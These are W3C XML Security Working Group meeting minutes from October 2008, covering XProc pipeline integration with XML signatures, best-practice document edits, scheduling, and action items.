Agenda See also: IRC log <trackbot> Date: 07 October 2008 <fjh> <scribe> Scribe: Gerald Edgar Norm Walsh - XML processing group what is the implication of XML processing on encryption. In the work by the xml processing group there were aspects of security in intial drafts, but that was taken out. The recognition of the need for inclusion was the prompt to contact this (the XMLSEC) gorup. <brich> In the XML Processing group, the goal is to produce a language that enables people to define a sequences of preocesses, composing processes from other proccesses. <klanz2> a reference process model for xml signatures, to process a document is perhaps similar to an xproc pipeline. <klanz2> XMLDSig Transfroms chains defines that Inputs and outputs are either, node-set data or octet streams, beside that interoperability is the limit and that's a rather hard limit ... Xproc has an extensability model. One example is in RDF where they can define the required steps Similarly, a security extention defining the steps for security could be done In xProc, there are 2 kinds of steps, the first is "atomic" e.g. XSLT and the second is "compound", which is composed of other steps. encryption and decryption could be defined as compound steps. the XPROC group at first saw security as atomic steps, but perhaps they were more complex is it that people adopting xproc would have to redo their processes? Is there open-source available for XProc? yes - e.g. "calabash" <klanz2> they are attempting to make this "streamable" there is no requirement for streamable. but a lot of the steps can steam. Xpath as a performance issue. there is flexability to use XPath 1 or XPath 2 most of the actions people use can use xpath 1 or xpath 2 is there a requirement for fidelity or "rountripping" mode? what flows in the pipeline are infosets. rather than a sequence of bytes. <fjh> norm notes c14n would be serialization step, end of pipeline the only step requiring the input and the out being the same is the identity step. <fjh> norm notes implementation defined what done with document before handed to piipeline schma validation is a step that might be done before handing the infoset to the pipeline. <fjh> norm notes XPath serialization all the steps have serialization options. providing security steps to XProc will also entail specifying the required security options <klanz2> Just, FYI .... then the additional serialization parameters MAY affect the output of the serializer to the extent (but only to the extent) that this specification leaves the output implementation-defined or implementation-dependent. ... <klanz2> from our last minutes: Will people learn to glue the primatives together? The Xproc group wants people to be able to use a pipeline rather than using a library. and to make this as easy as an XSLT sylesheet. The goal is to specify a standard XProc pipeline Norm: his view is that security is composed of compund steps. <fjh> norm notes may want compound step plus primatives [Konrad] is there a notion of payload? <fjh> norm notes, no protection from inherited namespace Norm: there is a notion of a payload - such as in an enclosed document ... there is work to define the security steps. ... he is willing to work with us on defining the steps. Hal: a notion of sending Xproc with a document. Norm:this is posable, Hal:this is a potential security hole. <fjh> norm notes security in 2.12, can send xproc with data Norm:there is not a notion of signing an XProc <fjh> norm notes [they have] have tried to keep core as small number of steps, 31, spec notes how to connect them Norm: they tried to minimize the basic steps (to 31) ... defining security in terms of Xproc, he does not see a problem with that. ... to define security - it is reasonable to use signed xproc. the pipeline is an XML document, it too can be signed. ... if we define security within XProc, he thinks this would be accepted. fjh:this would be a good idea to meet with XProc. Perhaps an hour to talk of this. <scribe> ACTION: fjh to sceduale time with XProc group for security [recorded in] <trackbot> Created ACTION-75 - Sceduale time with XProc group for security [on Frederick Hirsch - due 2008-10-14]. fjh:no meeting next week review the agenda for the F2F <fjh> draft f2f agenda - <fjh> fjh: Do we need to cancel any meetings? meet after the F2F? on the 4th, and 11th. Cancel the 25th of November. ( Since it is the Thanksgiving holiday in the US) fjh:propose to cancel the 25 resolution, Cancel the meeting on the 25th of November <tlr> my regrets for both of these fjh: we will have 8 calls before year-end to get the deliverables out. RESOLUTION: Cancel the meeting on the 25th of November RESOLUTION: Cancel the meeting of the 30th of December resolution: Cancel the meetings on the 25th November ... Cancel the meetings on the 25th November ... Cancel the meetings on the 30th of December 2008. fjh: minor changes, RESOLUTION: the minutes for the 23rd of September are approved. fjh: meetings [have been] firmed up at the face to face There are pointers to materials in the agenda. <fjh> webapps fjh: face to face planning. we need to have an adea of what we want to do we meet in January [in Redwood City] the next might be in May. <tlr> 2-6 November, Santa Clara The next Plenery is November 2-6 November [ In Santa Clara] <jcruella> UPC could host if you want We have the meeting at the plenery - so we have one more meeting to plan. fjh: the document has been edited. <fjh> proposal 1 - Review this to address issue 55 to change "should" to "it is recommended" there is a need to review the document carefully. fjh:to review and approve the document so we can publish it. RESOLUTION: The proposal for Issue-55 is accepted <klanz2> Not here and not here <klanz2> JCC: maybe post again your comments to the list ... <fjh> proposal 2 - FJH: issue -53 to reword the best practice - proposal 2 <jcruella> I had sent the message to another list...apologies.. I have now sent the message to the public list. This would close Action 72 <fjh> proposal 3 - RESOLUTION: To accept the proposal for issue-55 ... to accept the proposal for issue-53 <fjh> proposal 4 - ISSUE-56 Add references for timestamping proposal RESOLUTION: To accept the proposal to update the titles of the sections <fjh> <jcruella> sorry... was dropped of the call....call back in few seconds fjh: To add the references to xades in the best practices RESOLUTION: To add the references to xades in the best practices <fjh> proposal 5 - <trackbot> ACTION-70 -- Thomas Roessler to propose disclaimer for SOTD -- due 2008-09-30 -- PENDINGREVIEW <trackbot> <klanz2> "XAdES_v1.3.2" "" XML Advanced Electronic Signatures (XAdES). ETSI TS 101 903 V1.3.2 (2006-03) -> Talks about Timestamps for long term signatures ... Thomas: The wording that should be that the best practices are not normative. It is not a recommmendation. <tlr> ACTION-70 closed <trackbot> ACTION-70 Propose disclaimer for SOTD closed RESOLUTION: Accept the proposal from Action-70 from Thomas ... Accept the proposal from Action-70 from Thomas <jcruella> XAdES: the reference should include the complete title... could you put an action on me for providing it? <fjh> additional item from Bruce - <scribe> ACTION: jcruella to provide the complete title of XAdES for the best practices reference [recorded in] <trackbot> Created ACTION-76 - Provide the complete title of XAdES for the best practices reference [on Juan Carlos Cruellas - due 2008-10-14]. ... TO accept changes raised in terms of the corrections. <scribe> ACTION: Thomas to deal with the titling [recorded in] <trackbot> Created ACTION-77 - Deal with the titling [on Thomas Roessler - due 2008-10-14]. <tlr> action-77? <trackbot> ACTION-77 -- Thomas Roessler to deal with the titling -- due 2008-10-14 -- OPEN <trackbot> <scribe> ACTION: Pratik will add the time stamp reference to the best practices [recorded in] <trackbot> Created ACTION-78 - Will add the time stamp reference to the best practices [on Pratik Datta - due 2008-10-14]. <scribe> ACTION: fjh to address Action-53, Action-55 and action-70 [recorded in] <trackbot> Created ACTION-79 - Address Action-53, Action-55 and action-70 [on Frederick Hirsch - due 2008-10-14]. <fjh> jcc notes best practice 1 and 3 Juan Carlos: Best practice 1 and 3 to substitute terms <jcruella> Best Practice 1: Mitigate denial of service attacks by executing potentially dangerous operations only after authenticating the signature. <fjh> jcc notes text talks about building trust <jcruella> Best Practice 3: Establish trust in the verification/validation key. <fjh> jcc notes duplication <fjh> jcc suggestion changing title of bp #1 only after estabishing trust in the key <jcruella> Best Practice 1: Mitigate denial of service attacks by executing potentially dangerous operations only after establishing trust in the verification/validation key <jcruella> and eliminate best practice 3. <jcruella> Step 1 fetch the verification key and establish trust in that key fjh: edit the document that we can look at a complete draft rather than scattered proposals and fragments. <fjh> <fjh> WebApps SHA-1 Algorithm <fjh> take a look at the message on the mailing list - profiling on SHA-1 <fjh> <klanz2> <fjh> provide proposal on list regarding transform primitives <fjh> konrad suggests having simple transforms that can be implemented in parallel <fjh> konrad suggests they be idempotent Konrad: a collection of simple transforms potentially to be executed in parrallel Konrad: XPROC is much powerful than we need for signatures ... he is seeking simplification <fjh> what happens if an XML docuemnt incloudes a references to an XML name space and its effects on cononicalization Konrad: problems with a data model underneath c14n with xpath <fjh> Hoylen <tlr> ACTION: konrad to propose answer to [recorded in] <trackbot> Created ACTION-80 - Propose answer to [on Konrad Lanz - due 2008-10-14]. <scribe> ACTION: klanz2 to provide an answer from hoylen [recorded in] <trackbot> Created ACTION-81 - Provide an answer from hoylen [on Konrad Lanz - due 2008-10-14]. RESOLUTION: that all pending actions are closed <tlr> ACTION-4 closed <trackbot> ACTION-4 Arrange joint F2F meetings closed <tlr> ACTION-19 closed <trackbot> ACTION-19 Evaluate Issues and Actions for appropriate placement closed <klanz2> <klanz2> To finish processing L, simply process every namespace node in L, except omit namespace node with local name xml, which defines the xml prefix, if its string value is. <tlr> ACTION-65 closed <trackbot> ACTION-65 Document use case and semantics of byte-range signatures. closed <tlr> ACTION-67 closed <trackbot> ACTION-67 Edit best practices to implement Scott's and his own changes; see closed <tlr> ACTION-68 closed <trackbot> ACTION-68 Implement, closed <tlr> ACTION-72 closed <trackbot> ACTION-72 Contribute synopsis for each best practice closed
http://www.w3.org/2008/10/07-xmlsec-minutes
CC-MAIN-2013-48
refinedweb
1,820
59.94
Jan Fransen March 2003 Applies to: Microsoft® Office Word 2003 Microsoft Office Excel 2003 Microsoft Office PowerPoint 2003 Microsoft Office System Summary: Learn how to optimize the Research task pane in Office 2003. (12 printed pages) Introduction Getting Started Anatomy of a Research Task Pane Web Service The Registration Function The Query Function Registering and Testing the Web Service Finding Out What the User's Looking For Adding Data to the User's Document Summary The new Microsoft® Office 2003 Research task pane, available in Microsoft Office Word 2003, Microsoft Office Excel 2003, and Microsoft Office PowerPoint 2003, provides Office 2003 users with the ability to search certain local and remote data sources from within these Office 2003 products. Out of the box, the Research task pane includes several resources. For instance, Office 2003 users can query reference books such as the Encarta World Dictionary, or online resources like stock quotes. Most of the resources provided by Office 2003 are actually Web services. By creating a Web service that is compatible with the Research task pane (a Research service), you can give Office 2003 users access to information in corporate data sources from within the Office 2003 applications where the data is most likely to be used. This document will discuss how to create a Research service. The solutions you create can provide increasingly sophisticated search results such as: In order to experiment with these new features, you'll need to have the following tools installed: Like all Web services, a Research service is an application that uses open standards like XML and SOAP to communicate with a client via an Internet protocol backbone. A Web service doesn't provide a user interface of its own. Rather, a Web service simply receives an XML document from the client (in this case, the Research task pane in Office 2003) and responds by sending another XML document back. The client is responsible for sending an XML document that the service will understand, and parsing the returned XML document for use in an application or for display to the user. If the client is the Research task pane, it automatically handles both sending an appropriate XML document and formatting the Web service's response for display to the user within the Research task pane. The Research task pane can do much of the work because the Web services it calls are designed specifically to work with it. When you create a Research service, you follow certain rules. For instance, the Web service must contain two functions, Registration and Query, and the XML packets they use to communicate must comply with predefined XML schemas. You can find the full schemas in the Research SDK. Many of the elements and attributes used by the key schemas will be described later in this document. The Registration function is used to register the Research service with the Research task pane. Once registered, the service is available as a choice in the Show Results From dropdown. When the user installs the Research service as a Research task pane resource, a request is sent to the Registration function. The response is used to make appropriate entries in the Windows Registry, and must be formatted as defined by the Microsoft.Search.Registration.Response.xsd schema. The Query function is called when the user requests information from the Research service by searching for a term or using a form in the Research task pane. The Research task pane sends an XML packet complying with the Microsoft.Search.Query.xsd schema. The Research service must send a response based on the Microsoft.Search.Response.xsd family of schemas. To create a Research service, you create a new ASP.NET Web Service project using Visual Studio .NET. You can store the project in a folder within your IIS default Web site (). Before you can use a Research service, you must register it. An Office 2003 user registers a Research service by calling the Research service's Registration function. Any Research service Registration function uses the urn:Microsoft.Search namespace. The code within the Registration function creates and returns an XML packet in the format required by the Microsoft.Search.Registration.Response schema. Office 2003 uses information from the packet to add a reference for the Web service to the Windows Registry. Some of the data in the XML packet is used to describe the provider itself. These elements are described in Table 1. Table 1. Elements that describe the provider The data within the Service node of the XML packet describes the Research service. The elements are described in Table 2. Table 2. Elements in the Service node In Visual Basic .NET, the code to create a Registration Response XML packet might look like this: Imports System.Web.Services ' automatically added Imports System.Xml ' needed to read and create XML packets Imports System.IO ' needed to construct the XML packet in memory <WebService(Namespace:="urn:Microsoft.Search")> _ Public Class MyResearchPane Inherits System.Web.Services.WebService <WebMethod()> Public Function Registration(ByVal regXML As String) As String Dim ioMemStream As New MemoryStream() Dim myXMLwriter As New XmlTextWriter(ioMemStream, Nothing) With myXMLwriter .Indentation = 4 .IndentChar = " " .WriteStartDocument() .WriteStartElement("ProviderUpdate", _ ns:="urn:Microsoft.Search.Registration.Response") .WriteElementString("Status", "SUCCESS") .WriteStartElement("Providers") .WriteStartElement("Provider") .WriteElementString("Message", _ "Congratulations! You've registered Research Pane Examples!") .WriteElementString("Id", _ "{E545CFA2-E5AC-408a-92D9-E8C8487E6D69}") .WriteElementString("Name", "Research Pane Examples") .WriteElementString("QueryPath", _ "") .WriteElementString("RegistrationPath", _ "") .WriteElementString("Type", "SOAP") .WriteStartElement("Services") .WriteStartElement("Service") .WriteElementString("Id", _ "{942F685E-0935-42c8-80C5-95DB0D129910}") .WriteElementString("Name", "Research Pane Examples") .WriteElementString("Description", _ "Research Pane Examples provides a simple example of " & _ "customizing the Office Research Pane.") .WriteElementString("Copyright", _ "All content Copyright (c) 2003.") .WriteElementString("Display", "On") .WriteElementString("Category", "INTRANET_GENERAL") .WriteEndElement() ' Service .WriteEndElement() ' Services .WriteEndElement() ' Provider .WriteEndElement() ' Providers .WriteEndElement() ' ProviderUpdate .WriteEndDocument() End With myXMLwriter.Flush() ioMemStream.Flush() ioMemStream.Position = 0 Dim iostReader As New IO.StreamReader(ioMemStream) Return iostReader.ReadToEnd.ToString End Function After you write the Registration function, you can test it by choosing Build and Browse from the menu. You will see the standard Web service test page. After clicking through the Registration link to the Registration test page and clicking the Invoke button, you will see the Response XML packet in the browser window. Once you've written the Registration function, your Research service is complete enough to register with the Research task pane, but of course it cannot yet return any results. Before you can see a return value, you'll need to create a Query function. A typical Query Web method accesses a data source, such as a SQL Server database or a Windows SharePoint Services site, to gather information for display in the Research task pane. The Query function receives an XML packet that conforms to the Microsoft.Search.Query schema. It must return an XML packet that conforms to the Microsoft.Search.Response schema. The response packet must include at least the elements described in Table 3. Table 3. Required elements for the XML response packet The value of the domain attribute of the Response element must match the Service ID GUID you specified in the Registration Response XML packet. This GUID provides the Research task pane with a way of matching the response to your Research service; without it, the Research task pane assumes that your Web service returned no result. The QueryID GUID should be another unique GUID, and needn't match any other number. If a response is received, the Research task pane looks to the data in the Results node to determine what to display. The response packet reproduced here renders to a single paragraph under the Research Pane Examples heading, as shown in Figure 1. Figure 1. A query on any word (or no word) results in the same response from the sample Web service. The Results node usually contains a Content node. The Content node contains elements described in the Microsoft.Search.Response.Content schema, and the values of the elements supplied are rendered as rich text in the Research task pane. The most commonly used Content elements are listed in Table 4. Table 4. The most commonly used Content elements The Visual Basic .NET code for a simple Query function might look like this: <WebMethod()> Public Function Query(ByVal queryXml As String) As String Dim queryTerm As String Dim ioMemStream As New MemoryStream() Dim myXMLwriter As New XmlTextWriter(ioMemStream, Nothing) With myXMLwriter .Indentation = 4 .IndentChar = " " .WriteStartDocument() .WriteStartElement("ResponsePacket", _ ns:="urn:Microsoft.Search.Response") .WriteAttributeString("revision", value:=1) .WriteStartElement("Response") ' this GUID must match the Registration Service ID .WriteAttributeString("domain", _ value:="{942F685E-0935-42c8-80C5-95DB0D129910}") .WriteElementString("QueryID", _ "{690EF6D8-575D-4897-8F30-293E175C1B99}") .WriteStartElement("Range") .WriteStartElement("Results") .WriteStartElement("Content", _ ns:="urn:Microsoft.Search.Response.Content") .WriteElementString("P", "I heard you!") .WriteEndElement() ' Content .WriteEndElement() ' Results .WriteEndElement() ' Range .WriteElementString("Status", "SUCCESS") .WriteEndElement() ' Response .WriteEndElement() ' ResponsePacket .WriteEndDocument() End With myXMLwriter.Flush() ioMemStream.Flush() ioMemStream.Position = 0 Dim iostReader As New IO.StreamReader(ioMemStream) Return iostReader.ReadToEnd.ToString End Function After you've entered the code, you can Build and Browse the Query function and invoke the Query method. You can see the XML packet in the browser window. Registering and testing the Research service within Office 2003 is easy. You open Word, Excel, or PowerPoint and then the Research task pane by selecting Tools | Research from the main menu. Next, you click the Research options. . . hyperlink at the bottom of the pane, and then the Add Services button. In the Address text box of the Add Services dialog box, you type in the path to your Registration service, as shown in Figure 2, and click Add. You'll see a setup dialog box and choose the Install button. When you close the Research Options dialog box, the Research service is ready to query. Figure 2. Add a service by typing the path to your Registration service. To verify that the Research service has been registered, you drop down the Show results from list in the Research task pane and look for your newly created Research service. You can select it from here if you would like to try querying your Research service. Once your service is registered, you can continue to make changes to the Query function and test by building the service and then moving over to an Office 2003 product to try it out. There is no need to re-register each time you change the Query function. To find out about specific queries and respond with a relevant result, your Query function needs to parse the XML packet received from the Research task pane. The structure of the query packet follows the Microsoft.Search.Query schema. The QueryText element's value is the exact word or words entered by the user in the Research task pane. The query packet also provides a Keywords node that parses each individual word and also includes different word forms (the plural form of the word, for example) for each word. Given the ability to parse the XML packet to find out what the user is querying for, you can use whatever logic or queries necessary to provide an appropriate response. Typical code to extract the QueryText element from the query packet might look like this: Dim queryTerm As String Dim requestXML As New XmlDocument() requestXml.LoadXml(queryXml) Dim nsmRequest As New XmlNamespaceManager(requestXML.NameTable) nsmRequest.AddNamespace("ns", "urn:Microsoft.Search.Query") queryTerm = requestXML.SelectSingleNode( _ "//ns:QueryText", nsmRequest).InnerText In addition to text, headings, and hyperlinks, the Research task pane supports certain actions to transfer data from the Research task pane to the user's document. You can easily add Insert and Copy actions to your response, and you can also add support for custom Smart Tags that are installed on the user's machine. You can use the Actions element to add an Action button to the rendered response, as shown in Figure 3. Figure 3. The drop-down button shows Copy and Insert choices. Selecting Copy chores copies information about the item to the clipboard. Selecting Paste chores pastes information about the item into the current document at the cursor location. To specify the choices you want to see in the Action button, you add the Copy or Insert elements to the Actions node. The Text element controls the text that you see as the menu choices on the Action button. The Data element defines what data will be copied or inserted in the document if the user selects one of the choices. In addition to the Copy and Insert elements, you can use the Custom element to add your own Smart Tag to the choices. It is easy to create Web services that you can use with the Research task pane in Word, Excel and PowerPoint from Office 2003. You can create functions for registering and querying the Research service, and that you can install a Research service in the Research task pane. The response packet offers many options, and the Research task pane renders those response packets for display for the user. You'll find this aspect of Office 2003 to be both useful and easy in many projects.
http://msdn.microsoft.com/en-us/library/aa159647(office.11).aspx
crawl-002
refinedweb
2,193
54.52
On Fri, Aug 16, 2013 at 04:48:31PM +0200, Peter Krempa wrote: > The systemd code to create cgroups has fallback means built in, but > fails to engage them if a host isn't running DBus or libvirtd is > compiled without DBus (yes, you still don't need to run DBus). > > This patch changes the return value in case DBus isn't available to so > that the fallback code can be activated and cgroups are created > manually. > > Additionally, the functions no longer report errors as they were > reported over and over again and were no hard errors. > --- > daemon/libvirtd.c | 2 +- > daemon/remote.c | 2 +- > src/node_device/node_device_hal.c | 2 +- > src/nwfilter/nwfilter_driver.c | 4 ++-- > src/rpc/virnetserver.c | 2 +- > src/util/virdbus.c | 15 ++++++++------- > src/util/virdbus.h | 2 +- > src/util/virsystemd.c | 4 ++-- > 8 files changed, 17 insertions(+), 16 deletions(-) > diff --git a/src/util/virdbus.h b/src/util/virdbus.h > index 39de479..a30dbc3 100644 > --- a/src/util/virdbus.h > +++ b/src/util/virdbus.h > @@ -31,7 +31,7 @@ > # endif > # include "internal.h" > > -DBusConnection *virDBusGetSystemBus(void); > +DBusConnection *virDBusGetSystemBus(bool fatal); > DBusConnection *virDBusGetSessionBus(void); I'm really not at all a fan of 'bool fatal' like args to control error reporting. I think in this case we should have a bool virDBusHasSystemBus(void) method, which calls can use to determine if dbus is available. If not available then they can take a separate codepath as needed. This avoids the need to try something we expect to fail and then try to discard the errors. This would make the first patch uneccessary too. Daniel -- |: -o- :| |: -o- :| |: -o- :| |: -o- :|
https://www.redhat.com/archives/libvir-list/2013-August/msg00761.html
CC-MAIN-2014-15
refinedweb
269
51.95
----- Original Message ----- From: "Torsten Curdt" <tcurdt@dff.st> To: <cocoon-dev@xml.apache.org>; "Ivelin Ivanov" <ivelin@sbcglobal.net> Sent: Sunday, March 17, 2002 10:50 AM Subject: Re: Cocoon Form Handling > On Sun, 17 Mar 2002, Ivelin Ivanov wrote: > <snip/> > > > > ok - then we are on the same track... but please consider the population > > > syntax I proposed. I think resetting something is misleading and it works > > > fine without. > > > > I certainly would. You put a lot more thought into your code than I have for > > the snippet above. > > Can you please paste your code <here/> so that I can match exactly your > > syntax to the one above? > > see it action or event based rather than page based. a hit on a button > generates an event or action that populates and (maybe) validates. So you > are completely free to populate or not populate, to validate or not > validate on this specific event. Now I understand. It is actually in line with the recent Java Server Faces JSR which is mostly based on Struts, which in turn I appreciate. > > > > I have already implemented an abstraction for the binding. So binding a > > > bean is the same a having no a simple DOM as instance store instead. > > > > Yammy! > > How does one choose JavaBean vs DOM binding? > > Currently you just use a different implementation. But this should go > into a factory instead. > > look a this multiaction example: > > public class PreceptorDemoAction extends AbstractPreceptorAction { > public Map introspection(Redirector redirector, SourceResolver resolver, Map objectModel, String src, Parameters par) throws Exception { > Session session = createSession(objectModel); > > Preceptor preceptor = preceptorRegistry.lookupPreceptor("cocoon-installation"); > > // for a DOM > Instance instance = instanceFactory.createDOMInstance(); > // for a Bean > MyBean bean = new MyBean(); > Instance instance = instanceFactory.createBeanInstance(bean); A slight modification maybe. If we deal with a multi-page wizard, then the instance may already be in the session. So createInstane on request would only happen for the first page, but should then be reused for subsequent wizard pages. > > instance.initialize(preceptor); > > // if DOM or Bean you can always use > instance.setValue("cocoon-installation/user/name","enter here"); Based on experience, an application would be mostly either all DOM or all JavaBeans based. These few lines above should be probably replaced with some component parameter. > > session.setAttribute("feedbackform",instance); > return(page(FIRST)); > } > public Map doNext(Redirector redirector, SourceResolver resolver, Map objectModel, String src, Parameters par) throws Exception { does the reset() checkbox logic go here? > populate(objectModel, "feedbackform", "cocoon-installation/user/*"); > > List errors = validate(objectModel, "feedbackform", "cocoon-installation/user/*"); > if(errors != null) { > getLogger().debug("there are errors on the page"); > return (page(FIRST)); > } > else { > getLogger().debug("all constraints are ok"); > return (page(SECOND)); > } > } > > > So a 3 page wizard basically means 3 event hooks aka methods like the "doNext". > > > So if we manage to have a preceptor > > public interface Preceptor { > public ConstraintList getConstraitsFor( String xpath ); > public boolean isValidNode( String xpath ); > } > > ...wrapping the different validation APIs we can drop in > each validating schema: XSD,RELAX,DTD and (with the API link you sent) > maybe even Schematron... Oh boy, this is good. Let me think a bit on how to Implement the Preceptor for Schematron. Do you have one for Relax-NG working? Now I'm torn apart. Jeremy, do you think both methods can be merged somehow? If for example the BO bean becomes part of a document on the pipeline (like they usually do), then another XSD or Schematron that validates the bean as part of the whole document may be applied. In which case both Action and Pipeline validation are needed. Good job Torsten ! Sorry to repeat myself, but would you mind submitting the feedback wizard requirements which you were thinking about. It maybe easier if we have a point of reference for our discussion. Ivelin > > > Later I'd like to see this configurable with a XML descriptor. > -- > Torsten > --------------------------------------------------------------------- To unsubscribe, e-mail: cocoon-dev-unsubscribe@xml.apache.org For additional commands, email: cocoon-dev-help@xml.apache.org
http://mail-archives.apache.org/mod_mbox/cocoon-dev/200203.mbox/%3C003301c1cddd$938c5a80$0c91fea9@galina%3E
CC-MAIN-2016-22
refinedweb
650
50.33
When we learned about the switch statement, it is often presented to us as an elegant way to replace if and else if statements. I, too, overlooked its full potential. Due to my laziness, when I need it, I skim through it quickly to get the syntax to replace my if and else if. I never took the time to fully understand this little statement. It is more than if and else if. Now, I present you the other side of the switch statement. Its forgotten feature is to handle elegantly the step instructions. Notice that if you remove break; from the case statement, then it is transformed into a step instruction. This can be used in programs to list directions, do incremental database upgrade, etc. Since I'm the expert at cooking egg, here is how to cook an egg. public class SwitchFeature { public static void main(String[] args) { stepsRemainingToCookAnEgg(3); } private static void stepsRemainingToCookAnEgg(int step){ switch(step) { case 1: System.out.println("1: Turn on the stove."); case 2: System.out.println("2: Put the pan on the stove."); case 3: System.out.println("3: Put in the oil."); case 4: System.out.println("4: Throw in an egg."); case 5: System.out.println("5: Wait for 3 mintues and serve."); break; default: System.out.println("not found"); break; } } } The output Since I'm already at step 2: Put the pan on the stove, the remaining steps are: 3: Put in the oil. 4: Throw in an egg. 5: Wait for 3 mintues and serve.
https://openwritings.net/pg/java/forgotten-feature-java-switch
CC-MAIN-2020-40
refinedweb
258
78.45
When you are using React components you need to be able to access specific references to individual component instances. This is done by defining a ref. This lesson will introduce us to some of the nuances when using ref. Refs are a way for us to reference a node, or an instance of a component in our application. To get us started here, I'm creating a component that outputs a single input field. It's going to have an onChange event equal to this.update.bind to this. Right after, we're going to put out a bit of state, it's going to be this.state.a. import React from 'react'; class App extends React.Component { render(){ return ( <div> <input type="text" onChange={this.update.bind(this)} /> {this.state.a} </div> ) } } export default App We're going to go ahead and setup a constructor, we can create our initial state. We are going to call super() to get our context, and we're going to set this.state equal to an object with a key of a, which is equal to an empty string. I'm going to go ahead and create our update method. We're going to follow a familiar pattern here, we're just going to take an event off of the <input> field, and we're going to call this.setState or a equal to the event e.target.value. class App extends React.Component { constructor(){ super(); this.state = {a: ''} } update(e){ this.setState({a: e.target.value}) } render(){ ... } } It's going to be the value from our input field. We're going to save that, try it out in the browser, everything's going to work as expected when we type in the <input> field, it updates our state. Let's go ahead and say we wanted to have two of these guys, and drop in a <hr> just to break these up. On this one, we want it to update a state of b. Now, this isn't going to work with the existing pattern that we have in place, but we're just going to try it, we can see what happens. We're going to update our b with that value, as well. class App extends React.Component { constructor(){ super(); this.state = {a: '', b: ''} } update(e){ this.setState({ a: e.target.value, b: e.target.value }) } render(){ return ( <div> <input type="text" onChange={this.update.bind(this)} /> {this.state.a} <hr /> <input type="text" onChange={this.update.bind(this)} /> {this.state.b} </div> ) } } Now, when we type in the first field, the a field, it's updating both our a and our b state. Likewise, if we type in the b field, it's going to update our a and our b state. That's because we haven't differentiated between these two inputs. We can use a ref for that. On this guy, I'm going to say ref="a", and on the second field, I'm going to say ref="b", and that gives us a reference to each of these. I'm going to go ahead and kill off the event in our update method, and I'm going to set a to this.refs.a.value. update(){ this.setState({ a: this.refs.a.value, b: this.refs.b.value }) } render(){ return ( <div> <input ref="a" type="text" onChange={this.update.bind(this)} /> {this.state.a} <hr /> <input ref="b" type="text" onChange={this.update.bind(this)} /> {this.state.b} </div> ) } ref actually returns the node that we're referencing, here, I can say this.refs.b.value. Now, in the browser, when I type in the a field, it's updating our a state. When I type in the b field, it's updating our b state. The ref attribute or prop can also take a callback. Like I said before, it's returning the node or component that we're referencing, we get the node, we could take that, and here in our callback method, we could say this.a is equal to the node, and now for a, we can just call it, this.a. We get back that node, we can use the DOM method of value. Save that, and everything works as expected. update(){ this.setState({ a: this.a.value, b: this.refs.b.value }) } render(){ return ( <div> <input ref={node => this.a = node} type="text" onChange={this.update.bind(this)} /> {this.state.a} ... ) } We can also reference an instance of another component, here, let's create a quick component. We're going to call it Input, we're going to return an <input>, and on this, we'll just have an onChange equal to this.props.Update. class Input extends React.Component { render(){ return <input type="text" onChange={this.props.update} /> } } Up here, we're going to change this a input or input component, and now, since we're referencing a component, this is better represented by component rather than node. We'll say component there, and then, we're going to pass in this update, we don't need the type. <Input ref={ component => this.a = component} update={this.update.bind(this)} /> {this.state.a} Now, It's going to run that, and we're going to see that it's not exactly going to work. The b component is still working just fine, but here, a is no longer a node, it's now a component. One way we can get at that, is by bringing in ReactDOM, and then, wrapping this.a in ReactDOM.findDOMNode(this.a), which is our component, and then, get the value off of that. update(){ this.setState({ a: ReactDOM.findDOMNode(this.a).value, b: this.refs.b.value }) } Now, if we type in, here we get that value. The reason we're going to getting away with that is that, we are returning a single node here. When we get that component back, and we do findDOMNode on it, there's just one DOMNode there. But if we wrap this guy in a <div>, that findDOMNode call is referencing the <div> now, which has no value. One thing we could do, is put a ref on this guy, we'll call it input. class Input extends React.Component { render(){ return <div><input ref="input" type="text" onChange={this.props.update} /></div> } } Now, what we could do is, we can actually strip this back down, get rid of the ReactDOM find node part, and we could say, this.a which is our component.ref, we're getting the refs of our a component input, which is going to be that input field, and get its value. update() { this.setState({ a: this.a.refs.input.value, b: this.refs.b.value }) } We save that, we type in our a field, we get our a. We type in our b field, we get our you are using React components you need to be able to access specific references to individual components. This is done by defining a ref. I guess I'll find out this later, but why are the other values on range elements changed when you pulled on of them for the first time? In your example each state has initial value of 0, but each slider initial value is 128 (since min=0, max=255 and the thumb is in the middle of the slider). What is the way to initialize these in sync when using refs? Maybe there's a better approach? Ok, "Mixins" section already answered the question. Pass initial value as a prop and use it with defaultValue prop. Are we dipping into the DOM 3x each time a single slider is adjusted? If so, any best practice advice for only querying the DOM element (slider) being adjusted? I can get it to work by binding this and the color to each Slider component, but it seems hacky: Slider ref="red" update={this.update.bind(this, "red")} getDOMNode() is now findDOMNode() You're right, it should be: red: React.findDOMNode(this.refs.red.refs.inp).value, green: React.findDOMNode(this.refs.green.refs.inp).value, blue: React.findDOMNode(this.refs.blue.refs.inp).value Thanks! Did anyone got this to work? I am using ES6 right now? I would love to see at least at gist. I do not see the value in doing .getDOMNode vs, inp.getDOMNode. Am I the only one who see jQuery in this? I mean, "ref" depends on the structure of the HTML. If you change the hierarchy in the view it will fail @León - it's not HTML, it's JSX which represents JS functions. <Slider ref="red" update={this.update} /> is translated to: React.createElement(Slider, { ref: "red", update: this.update }) I believe you don't need to use findDOMNode at all now. You can just do: this stackoverflow answer says to avoid refs. Also the documentation sounds like refs are not ideal. Can this be built easily without using refs? Should refs actually be avoided? Why or why not? I think this video is out of date and the finished code is different than the code that is below, which took me some time to realize. Inside the slider class you want to make sure the input element has a ref called "inp". Like this: class Slider extends React.Component { render() { return ( ); } } The App itself needs to pull the value like this: ReactDOM.findDOMNode(this.refs.red.refs.inp).value The whole update method looks like this: update(e) { this.setState({ red: ReactDOM.findDOMNode(this.refs.red.refs.inp).value, green: ReactDOM.findDOMNode(this.refs.green.refs.inp).value, blue: ReactDOM.findDOMNode(this.refs.blue.refs.inp).value }); } Thanks! Is anyone else getting this error in the update method? Uncaught ReferenceError: ReactDOM is not defined I dont seem to be getting this though when calling ReactDOM.render at the bottom of App.js
https://egghead.io/lessons/react-using-refs-to-access-components
CC-MAIN-2017-04
refinedweb
1,651
68.57
